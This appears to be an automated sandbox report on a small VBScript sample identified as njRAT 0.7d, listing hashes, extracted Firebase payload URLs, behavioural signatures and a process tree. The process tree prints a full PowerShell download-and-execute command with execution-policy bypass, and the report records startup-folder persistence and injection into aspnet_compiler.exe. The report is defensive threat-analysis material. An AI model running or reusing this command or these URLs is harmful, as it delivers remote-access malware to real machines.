Analysis

max time kernel: 146s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20240419-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-05-2024 13:34

Static task: static1
Behavioral task: behavioral1
Sample: c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
Resource: win7-20240220-en
General

Target: c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
Size: 271B
MD5: b9acaac18eee9b5cde0c6defbe2c1caa
SHA1: 6f8cb34d61f9136e96345684846edf49dfa976bc
SHA256: c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1
SHA512: 70c8b3742c98e1daf2c7fda40c992621c2250a9dac648c4798370697f5688e1883162079909dd245a33fc064a843a94f84c7399b99bae9b6418a47b3c5e75e12
Malware Config

Extracted:
  https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8

Extracted:
  https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Ssid.jpg?alt=media&token=10629c63-3c23-437a-9543-4f9dcee695bb
  https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Rnew.jpg?alt=media&token=d68ad7e3-80ed-4083-ad53-8af401c5b503

Extracted: njrat
  version: 0.7d
  H
  splitter: |'|'|
Signatures

Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe, powershell.exe
  flow  pid   process
  7     4244  powershell.exe
  36    3272  powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe, WScript.exe
  description        ioc                                                                                                   process
  Key value queried  \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation  WScript.exe

Drops startup file (1 IoC)
Processes: powershell.exe
  description   ioc                                                                                     process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sCs.vbs   powershell.exe

Suspicious use of SetThreadContext (1 IoC)
Processes: powershell.exe
  description                          pid   process         target process
  PID 3272 set thread context of 4328  3272  powershell.exe  aspnet_compiler.exe

Command and Scripting Interpreter: PowerShell (title absent from the extracted signature list; taken from the matching entries in the process tree)
Processes: powershell.exe, powershell.exe
  pid   process
  4244  powershell.exe
  3272  powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
Processes: powershell.exe
  description  ioc                                                                                    process
  Key created  \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings   powershell.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes: powershell.exe, powershell.exe
  pid   process
  4244  powershell.exe
  4244  powershell.exe
  3272  powershell.exe
  3272  powershell.exe
  3272  powershell.exe
  3272  powershell.exe

Suspicious use of AdjustPrivilegeToken (33 IoCs)
Processes: powershell.exe, powershell.exe, aspnet_compiler.exe
  description                        pid   process
  Token: SeDebugPrivilege            4244  powershell.exe
  Token: SeDebugPrivilege            3272  powershell.exe
  Token: SeDebugPrivilege            4328  aspnet_compiler.exe
  Token: 33                          4328  aspnet_compiler.exe  (15 times, alternating with the row below)
  Token: SeIncBasePriorityPrivilege  4328  aspnet_compiler.exe  (15 times)

Suspicious use of WriteProcessMemory (17 IoCs)
Processes: WScript.exe, powershell.exe, WScript.exe, powershell.exe
  description                       pid   process         target process
  PID 4992 wrote to memory of 4244  4992  WScript.exe     powershell.exe       (2 times)
  PID 4244 wrote to memory of 1464  4244  powershell.exe  WScript.exe          (2 times)
  PID 1464 wrote to memory of 3272  1464  WScript.exe     powershell.exe       (2 times)
  PID 3272 wrote to memory of 1680  3272  powershell.exe  aspnet_compiler.exe  (3 times)
  PID 3272 wrote to memory of 4328  3272  powershell.exe  aspnet_compiler.exe  (8 times)
Processes

C:\Windows\System32\WScript.exe  (depth 1, PID 4992)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 2, PID 4244)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8'))
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WScript.exe  (depth 3, PID 1464)
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\sCs.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 4, PID 3272)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\sCs.ps1
        - Blocklisted process makes network request
        - Suspicious use of SetThreadContext
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe  (depth 5, PID 1680)
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"

        C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe  (depth 5, PID 4328)
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize  3KB
  MD5       556084f2c6d459c116a69d6fedcc4105
  SHA1      633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize  1KB
  MD5       6c25e98074e3843e30eeda41a1357b92
  SHA1      88aacfbe76ce89e2024d652a9ac37ad68518e3fe
  SHA256    17fa8418f7132c304749f477f7b514c3d6358a7d63b5c3f8529055862dfcd67f
  SHA512    03f82a7f8834e2a914a3486291d9b3cc97642ad8de55035bfc3a172dfe6ea1de2de2a14c974adf1ed32324f7414088f647ce683f0278881c2339d4551efb0e4c

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ioro4gom.or0.ps1
  Filesize  60B
  MD5       d17fe0a3f47be24a6453e9ef58c94641
  SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\sCs.ps1
  Filesize  1KB
  MD5       e0e7ea9409eb39ae9d9e06ea8d2acd94
  SHA1      3b8ab9de2c853a0238f3024eb8905ab81b8f634c
  SHA256    93b29bea09147a94220823e19c53a36c10ac8689bd196d73ae93e56c6acf3713
  SHA512    14cb12ce1637b7f2749179330328e6aa20871e6e5783f9e0d709ed2051241f0e4ee645c7d4629146c09c75f28470d4232b13aacc4193007c7b1d8644b25bd48f

C:\Users\Public\sCs.vbs
  Filesize  166B
  MD5       c3e1b2c797679d84c76dcdd5bb81db0d
  SHA1      f178c6888aa88ef7e940dd1b572ea9ac8c30c56c
  SHA256    cc9f01e9c6a3d717e775740b64106245324ecc9c77004f6c9b5d7d2e84cdf80b
  SHA512    be52acfd7294f31f7ee1c573711c915705f044cb762a6d5b6051f39f9774e7ef52287cfba5361e921ead9ca952e2c34f3a4210a4d8aa6badee78b1e7b713e22c

Memory dumps:
  memory/3272-34-0x0000025FA2AD0000-0x0000025FA2ADC000-memory.dmp   Filesize 48KB
  memory/4244-0-0x00007FFDAAEC3000-0x00007FFDAAEC5000-memory.dmp    Filesize 8KB
  memory/4244-1-0x000001C764FF0000-0x000001C765012000-memory.dmp    Filesize 136KB
  memory/4244-11-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp   Filesize 10.8MB
  memory/4244-12-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp   Filesize 10.8MB
  memory/4244-21-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp   Filesize 10.8MB
  memory/4328-35-0x0000000000400000-0x0000000000414000-memory.dmp   Filesize 80KB